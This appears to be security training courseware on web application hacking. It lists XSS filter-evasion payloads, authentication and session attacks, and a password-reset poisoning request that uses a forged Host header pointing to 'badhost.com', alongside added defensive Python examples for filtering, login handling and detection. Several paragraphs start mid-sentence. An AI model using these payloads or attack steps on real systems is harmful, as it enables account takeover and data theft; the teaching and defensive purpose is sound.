Perform Source Code Review
Attempt to acquire the source code of the target web application. After acquiring the source code, examine the code to understand the components, frameworks, etc., as well as their working to identify any existing vulnerabilities in the code. This examination can provide information about various functionalities such as removing client-side input validation, submitting nonstandard data to the server, manipulating client-side states or events, or directly invoking functionality that is present within the component.
Perform source code review to identify the following functionalities of a target component:
= Client-side input validation or other security-related logics and events
= Obfuscation or encryption techniques that are applied to the client data before it is transmitted to the server
= Modifiable components with hidden client-side functionalities
= References to server-side functionalities
Evade XSS Filters
XSS filter implementations are applied to web browsers to protect them from imminent XSS attacks; however, attackers can make them vulnerable by injecting unusual characters into the HTML code, through which they can evade the filter implementations. Attackers can embed harmful JavaScript into a web application in many ways. However, the latest browsers are implemented with strong security measures; hence, the script injection sometimes fails. Therefore, attackers often try to not only take advantage of application design flaws but also bypass input evaluation processes conducted by the server or application to trick complicated browser filters.
XSS attacks usually exploit improper configurations and security implementations of a browser, whereas filter bypassing methods are carried out by leveraging flaws in server- or browser-side filters, targeting certain versions or products. A major portion of the browser code is written with proper security measures to handle abnormal HTML, JavaScript, and CSS and fix them before delivery to the end users. XSS filter bypassing leverages such an intricate composition of specifications, exceptions, languages, and other browser characteristics to inject scripts through the filters without leaving a trace.
Various XSS filter evasion techniques are discussed below:
▪ Inserting <script> tags into the code is not allowed in a general context. However, some other HTML tags can permit these unusual injections. Event handlers are employed to run specific scripts corresponding to the authorized user actions. In general, event handlers such as <onfocus>, <onerror>, and <onclick> can be exploited to evade XSS filters.
▪ Encoding Characters: Attackers can embed various characters in different ways to evade filters that focus on inspecting text to detect unwanted strings. Approaches for character encoding include the following:
o A few or all of the characters of HTML elements can be written using ASCII codes to evade filters that search for strings such as <javascript>. Hexadecimal:
<a href="&#106;avascript:alert('XSS')">
o Base64 encoding can be used to cover the tracks of attack code; it pops up an alert with “Successful XSS”:
<body onload="eval(atob('U3VjY2Vzc2Z1bCBYU1M='))">
o The embedded character elements are from numbers 1-7, avoiding initial zeros. Therefore, any composition of zero padding is allowed:
<a href="&#x6A;avascript&#0000058&#0000097lert('Successful XSS')">Click Here!</a>
<iframe onmouseclick=alert(String.fromCharCode(88,83,83))></iframe>
▪ Embedding Whitespaces: Browsers allow convenient usage of whitespace characters while writing JavaScript or HTML code. Thus, attackers can easily evade filters by inserting non-printable characters.
o Tab spaces are avoided while processing the code; they can be invoked to split keywords. Consider this <img> tag:
<img src="java	script:al	ert('Successful XSS')">
You can also encode the tab spaces:
<img src="java&#x09;script:al&#x09;ert('Successful XSS')">
o Similarly, carriage return and newline characters are not considered during processing; thus, attackers can also encode these characters in between:
<a href="jav&#x0A;ascript:&#x0A;ale&#x0D;rt('Successful XSS')">Visit xyz.com</a>
▪ Manipulating Tags: XSS filter evasion can also be performed by manipulating tags and skipping attributes.
o When the filter inspects the script and deletes certain tags (mostly <script>), placing them within other tags can leave legitimate code after they are deleted:
<scr<script>ipt>document.write("Successful XSS")</scr<script>ipt>
o Attributes and tags can be separated by supplying a slash that helps in bypassing whitespace restrictions in value insertion:
<img/src="popup.jpg" onload=&#x6A;avascript:eval(alert('Successful XSS'))>
Attackers also exploit browser interpretations.
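A filter that looks for literal strings is defeated by every variant listed above, which is why the defensive fix is to canonicalize the input before inspecting it. The following Python is an added example and is not code from the CEH courseware: it decodes numeric entities (including the zero-padded and hexadecimal forms), strips the control characters that browsers ignore inside a keyword, and only then looks for indicators. The sample fragments are constructed from the page's own examples plus one benign link; the function names are my own.

```python
import html
import re

# Constructed samples modelled on the evasion techniques listed above:
# numeric entities, zero-padded entities, embedded tab/CR/LF and a slash
# used instead of whitespace. The last entry is a benign link.
SAMPLES = [
    '<a href="&#106;avascript:alert(\'XSS\')">',
    '<a href="&#x6A;avascript&#0000058&#0000097lert(\'XSS\')">Click</a>',
    '<img src="java\tscript:al\tert(1)">',
    '<img src="java&#x09;script:al&#x09;ert(1)">',
    '<a href="jav&#x0A;ascript:&#x0A;ale&#x0D;rt(1)">Visit</a>',
    '<img/src="popup.jpg" onload=&#x6A;avascript:eval(alert(1))>',
    '<a href="https://example.test/page">ok</a>',
]

# C0 control characters (tab, LF, CR, ...) that browsers tolerate inside a
# scheme or keyword, plus DEL.
CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')

# What the filter is really looking for, matched only after normalization.
INDICATORS = re.compile(r'javascript\s*:|<\s*script|\bon[a-z]+\s*=')


def naive_filter(fragment: str) -> bool:
    """The kind of literal-substring check the techniques above defeat."""
    lowered = fragment.lower()
    return 'javascript:' in lowered or '<script' in lowered


def normalize(fragment: str) -> str:
    """Decode HTML entities (zero-padded and hex forms included), strip
    control characters and lower-case the result, so that every spelling
    of the same payload collapses to one canonical string."""
    text = fragment
    # Decode repeatedly: an entity can itself encode an '&' (e.g. &#38;#106;).
    for _ in range(3):
        decoded = html.unescape(text)
        if decoded == text:
            break
        text = decoded
    text = CONTROL_CHARS.sub('', text)
    return text.lower()


def is_suspicious(fragment: str) -> bool:
    """Filter decision taken on the normalized form, not on the raw input."""
    return INDICATORS.search(normalize(fragment)) is not None


if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"naive={naive_filter(sample)!s:5} normalized={is_suspicious(sample)!s:5} {sample!r}")
```

Running it shows the naive check passing all six evasion samples while the normalized check flags each of them and still accepts the benign link. The indicator list is deliberately narrow; in practice output encoding at render time is the primary control and a filter like this is detection support, not a substitute.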
Attack Authentication Mechanism
Design and Implementation Flaws in Authentication Mechanism
▪ Bad Passwords
▪ Brute-Forcible Login
▪ Verbose Failure Messages
▪ Improper Validation of Credentials
▪ Predictable Usernames and Passwords
▪ Insecure Password Reset Mechanism
▪ Insecure Distribution of Credentials
▪ Fail-Open Login Mechanism
▪ “Remember Me” Functionality
▪ Insecure Storage of Credentials
Username Enumeration
Password Attacks: Password Functionality Exploits
Password Attacks: Password Guessing and Brute-forcing
Session Attacks: Session ID Prediction/Brute-forcing
Cookie Exploitation: Cookie Poisoning
Authentication Bypass: Bypass SAML-based SSO
combination of a username and password, which can be identified and exploited.
▪ Username Enumeration
Attackers can enumerate usernames in two ways: verbose failure messages and predictable usernames.
o Verbose Failure Message: In a typical login system, the user enters two fields, namely username and password. In some cases, an application will ask for additional information. If the user is trying to login and fails, it implies that at least one field was incorrect. This provides grounds for an attacker to exploit the application. Examples:
* Account <username> not found
* Incorrect password provided
* Account <username> has been locked out
o Predictable Usernames: Some applications automatically generate account usernames according to some predictable sequence. This makes it very easy for the attacker to discern the sequence for a potentially exhaustive list of valid usernames.
▪ Password Attacks
o Password guessing
o Brute-force attack
o Dictionary attack
o Attack password reset mechanism
▪ Session Attacks
The following types of session attacks are employed by attackers against authentication mechanisms of applications:
o Session prediction: It focuses on predicting session ID values that allow an attacker to bypass the authentication mechanism of an application. By analyzing and understanding the session ID generation process, the attacker can predict a valid session ID value and gain access to the application.
o Session brute-forcing: An attacker brute-forces the session ID of a target user and uses it to login as a legitimate user and gain access to and modify the application.
o Session poisoning: It allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
▪ Cookie Exploitation
Cookie exploitation attacks are of the following types:
o Cookie poisoning: It is a type of parameter tampering attack in which the attacker modifies the cookie contents to draw unauthorized information about a user and thus perform identity theft.
o Cookie sniffing: It is a technique in which an attacker sniffs a cookie containing the session ID of the victim who has logged in to a target website and uses the cookie to bypass the authentication process and login to the victim's account.
o Cookie replay: It is a technique used to impersonate a legitimate user by replaying the session/cookie that contains the session ID of that user (as long as he/she remains logged in). This attack stops working once the user logs out of the session.
▪ Bypass Authentication
o Bypass SAML-based SSO: Attackers take advantage of signature misconfigurations, session expiry timeouts, session replays, misdirected SAML messages, etc., to bypass SAML-based SSO authentication.
Design Flaws in Authentication Mechanism
Authentication mechanisms are more vulnerable to attacks than other implementations involved in web application security. Applications usually validate a user via his/her login credentials; even a minor weakness in this authentication process can lead to serious consequences such as granting access to illegitimate users.
▪ Bad Passwords: Any application is designed to have minimum control over checking and validating the user credentials. Users often come across applications that accept passwords such as blank or short values, ordinary names, dictionary words, the same password as the username, and default parameters. Such passwords can be easily guessed by the attackers, allowing them to access the application resources.
▪ Brute-Forcible Login: The login feature of an application allows an attacker to predict user credentials, through which the attacker can enter the application illegitimately. If the application permits numerous login attempts without any restrictions, such as blocking an account after a certain number of attempts, attackers can continue to try different passwords until they find the right one. Thus, even an unprofessional hacker can login by manually entering different password combinations.
▪ Verbose Failure Messages: Any login form of an application requests users to feed at least two fields, namely username and password. A few applications may also ask for additional parameters such as DOB, answer to a security question, and OTP pin, to validate a user. If the login attempt is unsuccessful, the application indicates that the information provided is not valid. When the application specifies which field is incorrect or pops up reasons for denying access, attackers can easily exploit that field by trying a large set of similar names or words to enumerate valid data required to access the application. The list of enumerated data can also be used later for social engineering.
▪ Insecure Transmission of Credentials: If an application makes an insecure HTTP connection to pass sensitive information, it becomes susceptible to MITM attacks, through which attackers can eavesdrop on and impede data transmission. Even though the HTTPS connection is made, attackers can still steal the credentials if the application handles credentials in an insecure manner such as passing information as query string parameters and storing credentials in cookies.
passwords immediately to prevent illegitimate use. Sometimes, this password reset feature can also be exploited. Vulnerabilities that are ignored in the main login function can appear again in the password reset mechanism. Some of the flaws in the password reset mechanism are as follows:
o Generating the verbose error, specifying if the username is valid
o Enabling guessing of the “Existing password” field without any restrictions
o Checking if the “New Password” and “Confirm Password” fields comprise the same values only after authenticating the existing password, thereby permitting an attack to be successful in identifying the existing password explicitly
▪ Forgotten Password Mechanism: As with the password change mechanism, methods for recovering forgotten passwords often entail issues that are commonly ignored in the main login function, such as enumerating usernames. Additionally, several design flaws in the forgotten password mechanism often make it more vulnerable, through which the overall authentication logic of an application is targeted. Some of the flaws in the forgotten password mechanism are as follows:
o Providing a secondary challenge when a user forgets a password
o Developers often ignore the chances of the application being brute-forced during the password recovery process. If the application allows any number of attempts to recover the password, it is highly likely that the password will be recovered by guessing random answers related to the user
▪ “Remember Me” Functionality: Applications also provide the “Remember Me” function for convenience to avoid reentry of the username and password when a user tries to sign into an application from his/her device repeatedly. This mechanism is often vulnerable because the user can be attacked from both a local computer and users on other machines. “Remember Me” functions are enforced with some persistent cookies. When these cookies are initiated, the application trusts them as they were already stored in the earlier session and generates a new session without asking for the login credentials again. Attackers can try a list of ordinary words or enumerated usernames to gain complete access to the application without being validated.
▪ User Impersonation: Some privileged users access applications using other user credentials to assist the original users in performing their operations. For instance, if the Internet connection is broken, the user contacts the service provider to seek advice. Then, the customer care executive logs in with the user data in his or her system and assists the user in resolving the service outage. If an application allows privileged users to impersonate others, any flaws in the impersonating logic can lead to privilege escalation, through which an attacker can gain complete access.
▪ Improper Validation of Credentials: Applications are designed with proper authentication mechanisms such as accepting passwords with a minimum length and allowing case-sensitive (upper and lower case), numeric, and special characters. By contrast, a poorly designed application's authentication mechanisms not only ignore good security implementations but also fail to consider the user's attempts to apply strong password characters. For instance, some applications shorten the password and evaluate only the first few characters. A few applications check for case-insensitive passwords and others perform unusual character stripping before password checks. Attackers can perform automated password guessing attacks on such applications to remove the unwanted test cases and shorten the number of requests required to compromise an account.
▪ Predictable Usernames and Passwords: A few applications automatically produce usernames based on a predictable sequence. Attackers exploit this characteristic of an application and instantly acquire the valid list of usernames, through which they can perform further attacks. Sometimes, the user list is created all at once or in the form of groups, and all these users' initial passwords are distributed via some sources. The sources for creating passwords can allow the attacker to guess the passwords of the users. Such vulnerabilities are often triggered within an intranet environment.
▪ Insecure Distribution of Credentials: Most applications adopt a procedure in which the login credentials are supplied via SMS, email, post, etc. In some cases, what is supplied to users may include not only login credentials but also a URL consisting of an “activation code” to change the system-generated or initially generated passwords. If a bunch of such URLs are sent to the same users, attackers can discover this activity by enrolling multiple user accounts and deduce the activation codes sent via URLs to the newly enrolled and yet-to-be enrolled users.
Implementation Flaws in Authentication Mechanism
Sometimes, carefully designed application security mechanisms open gateways to attacks due to some mistakes in their enforcement. These mistakes may lead to information leakage, bypassing of login, or diminishing security of the entire security module. Implementation flaws in authentication are more dangerous as they cannot be discovered with normal testing methods. Some of the implementation flaws in authentication mechanisms are as follows:
▪ Fail-Open Login Mechanism: It is a logic defect that leads to significant consequences in the authentication process. For instance, invoking db.getUser() can trigger some exceptions, such as a null pointer exception, as the requested function has no username or password credentials, but it can still login. This session may be dependent on a specific user identity; hence, even when it is not fully functional, it can still allow attackers to access critical information or functionality.
Example:
public Response verifyLogin(Session mySession) {
    try {
        // db.getUser() as described in the text; the accessor names are assumed
        User user = db.getUser(mySession.getUsername(), mySession.getPassword());
        if (user == null) {
            // invalid credentials
            mySession.setMessage("Login Failed.");
            return doLogin(mySession);
        }
    } catch (Exception e) {
        // exception swallowed: execution falls through to the success path below
    }
    // valid user
    mySession.setMessage("Login successful!");
    return doMainMenu(mySession);
}
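To make the fail-open defect concrete, here is an added Python model of the snippet above (it is not the courseware's code) with a stand-in session object and user lookup that raises when credentials are missing, beside a fail-closed version in which every error and every non-positive result denies access. The class and function names are assumptions for the example.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Session:
    """Constructed stand-in for the mySession object in the snippet above."""
    username: Optional[str] = None
    password: Optional[str] = None
    message: str = ""


class UserDB:
    """Constructed stand-in for db; get_user raises when a credential is
    missing, which is the exception the text says db.getUser() can throw."""

    def __init__(self, users: dict):
        self.users = users

    def get_user(self, username: Optional[str], password: Optional[str]) -> Optional[str]:
        if username is None or password is None:
            raise TypeError("credentials missing")        # the null-pointer case
        return username if self.users.get(username) == password else None


def verify_login_fail_open(db: UserDB, session: Session) -> str:
    """Same control flow as the snippet: the catch block swallows the error,
    so execution falls through to the 'valid user' path."""
    try:
        if db.get_user(session.username, session.password) is None:
            session.message = "Login Failed."
            return "login"                   # doLogin(mySession)
    except Exception:
        pass                                 # catch (Exception e) {}
    session.message = "Login successful!"
    return "main_menu"                       # doMainMenu(mySession)


def verify_login_fail_closed(db: UserDB, session: Session) -> str:
    """Fail-closed form: any exception, and any None result, denies access;
    the success path is reached only through an explicit positive check."""
    try:
        user = db.get_user(session.username, session.password)
    except Exception:
        user = None                          # treat errors exactly like bad credentials
    if user is None:
        session.message = "Login Failed."
        return "login"
    session.message = "Login successful!"
    return "main_menu"


if __name__ == "__main__":
    db = UserDB({"alice": "s3cret"})
    print("fail-open, no credentials:  ", verify_login_fail_open(db, Session()))
    print("fail-closed, no credentials:", verify_login_fail_closed(db, Session()))
```

A request with no credentials at all reaches the main menu in the fail-open version; the fail-closed version treats the exception like a wrong password. The general rule is that the success branch must be the only branch that grants access, never the default one.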
▪ Flaws in Multistage Login Functionality: Multistage login functionality is an advanced security mechanism for username-and-password-based login models. This login method is performed in three stages: username and password entry, a challenge for certain input digits or memorable characters, and value submissions disclosed on changing a physical token. The first stage involves users validating themselves with their username and other valid input, and the remaining stages carry out different validation checks. Such validations often come with different vulnerabilities known as logic defects.
▪ Insecure Storage of Credentials: Although an application may have no inherent flaws, it can make itself vulnerable by storing login credentials in an insecure way. In general, applications store user credentials in a database in an unencrypted form. Some applications use weak encryption algorithms to encrypt and store credentials. Vulnerabilities in such implementations allow attackers to perform brute-force and password cracking attacks.
Username Enumeration
Source: https://wordpress.com
If a login error states which of the username or password is incorrect, that field can be guessed using the trial-and-error method. Consider the following example. An attacker tries to enumerate the username and password of “Rini Matthews” on wordpress.com. In the first attempt, the attacker tries to login as “rini.matthews,” which results in the login failure message “invalid email or username.”
Figure 14.6: Error message for username rini.matthews does not exist
In the second attempt, the attacker tries to login as “rinimatthews,” which results in a message stating that the password entered for the username is incorrect, thus confirming that the username “rinimatthews” exists.
Figure 14.63: Error message for username rinimatthews successfully enumerated
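The countermeasure for the enumeration shown above, and for the verbose failure messages described under design flaws, is a login routine that returns one message for every failure and does the same amount of work whether or not the username exists. The following Python is an added example, not code from the courseware or from wordpress.com; the user store, the password and the function names are constructed for the illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 50_000


def hash_password(password: str, salt: bytes = None) -> tuple:
    """PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: one known account with a password chosen for the example.
USERS = {"rinimatthews": hash_password("correct horse battery staple")}
# A dummy record so that unknown usernames cost the same work as known ones.
DUMMY = hash_password(os.urandom(8).hex())


def check(password: str, record: tuple) -> bool:
    salt, digest = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)


def login_verbose(username: str, password: str) -> tuple:
    """Leaks which field failed, like the messages shown in the figures above."""
    record = USERS.get(username)
    if record is None:
        return False, "Invalid email or username."
    if not check(password, record):
        return False, "The password you entered for the username %s is incorrect." % username
    return True, "Login successful."


GENERIC = "Invalid username or password."


def login_uniform(username: str, password: str) -> tuple:
    """One message for every failure, and the hash is always computed so the
    response time does not reveal whether the username exists."""
    known = username in USERS
    ok = check(password, USERS[username] if known else DUMMY) and known
    return ok, ("Login successful." if ok else GENERIC)


if __name__ == "__main__":
    for name in ("rini.matthews", "rinimatthews"):
        print(name, "->", login_verbose(name, "guess")[1], "|", login_uniform(name, "guess")[1])
```

With the verbose variant the two usernames produce different messages, which is exactly the oracle the figures show; the uniform variant answers both with the same text. The dummy hash matters as much as the message: skipping the hash for unknown users would leave a timing difference that a patient attacker can measure.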
for the “Old Password”, “New Password”, and “Confirm New Password” fields and analyze errors to identify vulnerabilities in the password change functionality.
▪ Password Recovery: “Forgot Password” features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the answer and solve the challenge successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved.
▪ “Remember Me” Exploit: “Remember Me” functions are implemented using a simple persistent cookie such as RememberUser=jason or a persistent session identifier such as RememberUser=ABY112010. Attackers can use an enumerated username or predict the session identifier to bypass authentication mechanisms.
Password Attacks: Password Guessing
As its name implies, password guessing is the process of guessing possible user keywords that might constitute an account password until eventually arriving at the correct one. To guess passwords, attackers use techniques such as password lists and password dictionaries.
▪ Password List: The majority of keywords used for preparing the password list includes certain daily usage words such as birth date, street name, nickname, anniversary date, phone number, pin number, parent's or friend's name, and pet's name. Create a list of possible passwords using the most commonly used passwords as well as footprinting and social engineering techniques, and try each password until the correct password is discovered.
▪ Password Dictionary: A password dictionary is the compilation of word and number combinations that could be passwords. This type of attack saves time compared to a brute-force attack. Create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.
Tools
Password guessing can be performed manually or using automated tools such as THC-Hydra, Burp Suite, and Dictionary Maker.
o THC-Hydra
Source: https://www.thc.org
THC-Hydra is a network logon cracker that supports many different services, such as IPv6 and Internationalized RFC 4013. It comes with a GUI and supports HTTP proxy and SOCKS proxy. Furthermore, it uses various authentication methods for services, including Firebird, FTP, IMAP, LDAP, MS-SQL, RDP, SMTP, SNMP, and Telnet.
Figure 14.64: Screenshot of THC-Hydra
▪ Brute-forcing
Brute-forcing is another method used for cracking passwords. Guessing becomes crucial when the password is long or contains letters in upper and lower cases. If numbers and symbols are used, it could take several years to guess the password, which is impractical. Try to crack the password by trying all possible values from a set of alphabetical, numerical, and special characters. Use password cracking tools such as Burp Suite to crack the password.
Password Cracking Tools
Some brute-forcing tools for cracking passwords are described below.
▪ Burp Suite
Source: https://portswigger.net
Burp Suite built-in tools:
o Intercepting proxy for inspecting and modifying traffic between your browser and the target application
o Application-aware spider for crawling content and functionality
o Web application scanner for automating the detection of numerous types of vulnerabilities
o Intruder tool for performing customized attacks to find and exploit unusual vulnerabilities
o Repeater tool for manipulating and resending individual requests
o Sequencer tool for testing the randomness of session tokens
Figure 14.65: Screenshot of Burp Suite
Some additional password cracking tools are as follows:
▪ L0phtCrack (https://www.l0phtcrack.com)
▪ ophcrack (http://ophcrack.sourceforge.net)
▪ RainbowCrack (http://project-rainbowcrack.com)
▪ Windows Password Recovery Tool (https://www.windowspasswordsrecovery.com)
▪ Dictionary Maker (http://dictionarymaker.sourceforge.net)
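From the defender's side, guessing and brute-forcing show up in the authentication log as bursts of failures, so the detection logic is worth seeing alongside the tools. The following Python is an added example and not part of the courseware: it parses a constructed log excerpt and flags two patterns, many failures from one source (guessing or brute-forcing) and one source failing against many different accounts (password spraying, which stays under per-account lockout thresholds). The log format, addresses and thresholds are constructed for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log excerpt (not from any real system).
LOG_LINES = """\
2020-11-02T10:00:01 src=198.51.100.7 user=bob result=FAIL
2020-11-02T10:00:03 src=198.51.100.7 user=bob result=FAIL
2020-11-02T10:00:05 src=198.51.100.7 user=bob result=FAIL
2020-11-02T10:00:08 src=198.51.100.7 user=bob result=FAIL
2020-11-02T10:00:12 src=198.51.100.7 user=bob result=FAIL
2020-11-02T10:00:15 src=198.51.100.7 user=bob result=FAIL
2020-11-02T10:01:00 src=203.0.113.9 user=alice result=FAIL
2020-11-02T10:01:04 src=203.0.113.9 user=carol result=FAIL
2020-11-02T10:01:09 src=203.0.113.9 user=dave result=FAIL
2020-11-02T10:01:13 src=203.0.113.9 user=erin result=FAIL
2020-11-02T10:02:00 src=192.0.2.5 user=alice result=FAIL
2020-11-02T10:02:30 src=192.0.2.5 user=alice result=OK
""".splitlines()

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<res>\S+)$")


def parse(lines):
    """Turn log lines into event dicts; lines that do not fit the format are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]),
                           "src": m["src"], "user": m["user"], "res": m["res"]})
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Sources with at least `threshold` failures inside any sliding window."""
    fails = defaultdict(list)
    for ev in events:
        if ev["res"] == "FAIL":
            fails[ev["src"]].append(ev["ts"])
    flagged = {}
    for src, times in fails.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:      # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[src] = max(flagged.get(src, 0), count)
    return flagged


def detect_spray(events, min_users=4, window=timedelta(minutes=5)):
    """Sources that fail against at least `min_users` distinct accounts inside a window."""
    by_src = defaultdict(list)
    for ev in events:
        if ev["res"] == "FAIL":
            by_src[ev["src"]].append(ev)
    flagged = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            users = {e["user"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(users) >= min_users:
                flagged[src] = max(flagged.get(src, 0), len(users))
    return flagged


if __name__ == "__main__":
    evs = parse(LOG_LINES)
    print("brute force:", detect_bruteforce(evs))
    print("spraying:   ", detect_spray(evs))
```

The single mistyped password from 192.0.2.5 trips neither rule, the six rapid failures against bob trip the first, and the four failures spread over four accounts trip the second even though no single account saw more than one failure. Thresholds should be tuned to the application's normal failure rate, and the same logic applies to the password reset and “Forgot Password” endpoints discussed above.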
Password Attacks: Attack Password Reset Mechanism
Insecure password management practices lead to critical security vulnerabilities. One such vulnerability is password reset poisoning, which is exploited by the attacker to leverage headers such as Host in the HTTP request message.
Resetting the password is a common function used by the user when he/she forgets his/her password and needs to reset it. The user receives a forgot password link via email containing the one-time token, and when the link is clicked, the server responds with a password reset page.
For example, consider the following HTTP request where the attacker uses the Host header to perform the attack:
GET https://certifiedhacker.com/reset.php?email=foo@bar.com HTTP/1.1
Host: badhost.com
The following password reset link is sent to the victim:
$resetPwdURL = "https://{$_SERVER['HTTP_HOST']}/reset-pwd.php?token=87654321-8765-8765-8765-10987654321"
The abovementioned URL link is injected in the password reset email as:
https://badhost.com/reset-password.php?token=87654321-8765-8765-8765-10987654321
Step 3: Now, the attacker waits for the victim to receive the modified email.
Step 4: Once the victim clicks on the malicious link embedded in the email, the attacker extracts the password reset token. Using this token, the attacker performs various malicious activities such as cloning web applications to steal the user's credentials or acting as a proxy and mimicking the behavior and contents of the original website.
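The root cause in the $resetPwdURL line above is that the link's host comes from the request. As an added example (not the courseware's code), the Python below puts the vulnerable construction next to a hardened one that validates the Host header against an allowlist and builds the link from a configured origin, so a forged Host can neither redirect the token nor reach the mail template. The origin is the page's example domain; the allowlist, the token generator and the function names are assumptions for the illustration.

```python
import secrets
from urllib.parse import urlsplit

# Canonical origin of the application, taken from configuration (the page's
# example domain). It is never derived from the incoming request.
CANONICAL_ORIGIN = "https://certifiedhacker.com"
ALLOWED_HOSTS = {"certifiedhacker.com"}


def new_reset_token() -> str:
    """Unguessable one-time token; the fixed token shown on the page is only an illustration."""
    return secrets.token_urlsafe(32)


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """Same construction as $resetPwdURL above: the Host header is trusted."""
    return "https://%s/reset-pwd.php?token=%s" % (headers["Host"], token)


def reset_link_hardened(headers: dict, token: str) -> str:
    """Reject any Host that is not ours, then build the link from the
    configured origin rather than from anything the client sent."""
    host = headers.get("Host", "").split(":", 1)[0].strip().lower()
    if host not in ALLOWED_HOSTS:
        raise ValueError("rejected request with unexpected Host header: %r" % host)
    return "%s/reset-pwd.php?token=%s" % (CANONICAL_ORIGIN, token)


def link_host(link: str) -> str:
    """Host component of a generated link, for checking where the token would go."""
    return urlsplit(link).hostname


if __name__ == "__main__":
    token = new_reset_token()
    print("vulnerable:", reset_link_vulnerable({"Host": "badhost.com"}, token))
    print("hardened:  ", reset_link_hardened({"Host": "certifiedhacker.com"}, token))
```

Rejecting unexpected Host values at the framework level (an allowed-hosts setting) covers every place the header might be used, not just the reset mailer; pairing that with single-use, short-lived tokens limits the damage if a link does leak.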
Session Attacks: Session ID Prediction/Brute-forcing
Every time a user logs in to a particular website, the server assigns a session ID to the user to keep track of all the activities on the website. This session ID is valid until the user logs out; the server provides a new session ID when the user logs in again. Attackers try to exploit this session ID mechanism by guessing the next session ID after collecting some valid ones. For certain web applications, the session ID information involves a string of fixed width. Randomness is essential to avoid prediction.
Session attacks are performed in the following steps:
▪ In the first step, collect some valid session ID values by sniffing traffic from authenticated users.
▪ Analyze the captured session IDs to determine the session ID generation process, such as the structure of the session ID, the information that is used to create it, and the encryption or hash algorithm used by the application to protect it.
▪ Vulnerable session generation mechanisms that use session IDs composed of a username or other predictable information, such as timestamp or client IP address, can be exploited by easily guessing valid session IDs.
▪ In addition, you can implement a brute-force technique to generate and test different values of the session ID until you successfully gain access to the application.
From the diagram below, you can see that the session ID variable is indicated by JSESSIONID and its assumed value is “user01,” which corresponds to the username. By guessing its new value, say, as “user02,” it is possible for the attacker to gain unauthorized access to the application.
Figure 14.66: Screenshot displaying predictable session cookie
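The analysis step above (structure, alphabet, sequence) can be reduced to two quick checks that a reviewer can run over a captured batch of session IDs. The following Python is an added example and not part of the courseware: it computes the per-character entropy of the batch and looks for an incrementing numeric suffix, then compares the JSESSIONID values from the figure against a batch of random tokens. The sample batches are constructed (the random batch uses a fixed seed so the run is reproducible; a real server would draw from the secrets module), and the function names and the 4-bit threshold are assumptions.

```python
import math
import random
import re
from collections import Counter

# Constructed samples: the predictable JSESSIONID values from the figure above
# and a batch of random tokens generated with a fixed seed for reproducibility.
PREDICTABLE_IDS = ["user01", "user02", "user03", "user04", "user05", "user06"]
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
_rng = random.Random(20201102)
RANDOM_IDS = ["".join(_rng.choice(ALPHABET) for _ in range(22)) for _ in range(20)]


def entropy_bits_per_char(ids: list) -> float:
    """Shannon entropy of the character distribution over all captured IDs."""
    counts = Counter("".join(ids))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def looks_sequential(ids: list) -> bool:
    """True when every ID ends in a number and consecutive captures differ by 1."""
    suffixes = [re.search(r"(\d+)$", s) for s in ids]
    if len(ids) < 3 or any(m is None for m in suffixes):
        return False
    nums = [int(m.group(1)) for m in suffixes]
    return all(b - a == 1 for a, b in zip(nums, nums[1:]))


def assess(ids: list, min_bits: float = 4.0) -> dict:
    """Flag a session ID scheme as predictable when it is sequential or its
    alphabet is too narrow. Burp Sequencer applies far more tests than this;
    the point is that the figure's scheme fails even the simplest ones."""
    bits = entropy_bits_per_char(ids)
    seq = looks_sequential(ids)
    return {"entropy_bits": round(bits, 2), "sequential": seq,
            "predictable": seq or bits < min_bits}


if __name__ == "__main__":
    print("figure's IDs:", assess(PREDICTABLE_IDS))
    print("random IDs:  ", assess(RANDOM_IDS))
```

The figure's values score about 3 bits per character and are sequential; the random batch scores close to the 6-bit ceiling of a 64-symbol alphabet and has no order. A fixed-width ID drawn from a cryptographic generator and rotated on every login is the fix for everything the steps above exploit.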
Cookie Exploitation: Cookie Poisoning
Cookies frequently transmit sensitive credentials from the client browser to the server. Attackers can modify these with ease to gain access to the server or assume the identity of another user.
Client browsers use cookies to maintain a session state when they employ stateless HTTP protocol IDs for communication. Servers tie unique sessions to the individual accessing the web application. Poisoning of cookies and session information can allow an attacker to inject malicious content or modify the user's online experience and obtain unauthorized information. Cookies can contain session-specific data such as user IDs, passwords, account numbers, links to shopping cart contents, supplied private information, and session IDs. They exist as files stored in the client computer's memory or on its hard disk. By modifying the cookie data, an attacker can often gain escalated access or maliciously affect the user's session. Many sites offer the “Remember me?” function and store the user information in a cookie so that the user does not have to re-enter the data with every visit to the site. Any private information entered is stored in a cookie. To protect cookies, site developers often encode them. Encoded cookies give developers a false sense of cookie security, as the encoding process can easily be reversed with decoding methods such as Base64 and ROT13 (rotating the letters of the alphabet through 13 characters).
Cookie poisoning is performed in the following steps.
▪ If the cookie contains passwords or session identifiers, steal the cookie using techniques such as script injection and eavesdropping
▪ Then, replay the cookie with the same or altered passwords or session identifiers to bypass web application authentication
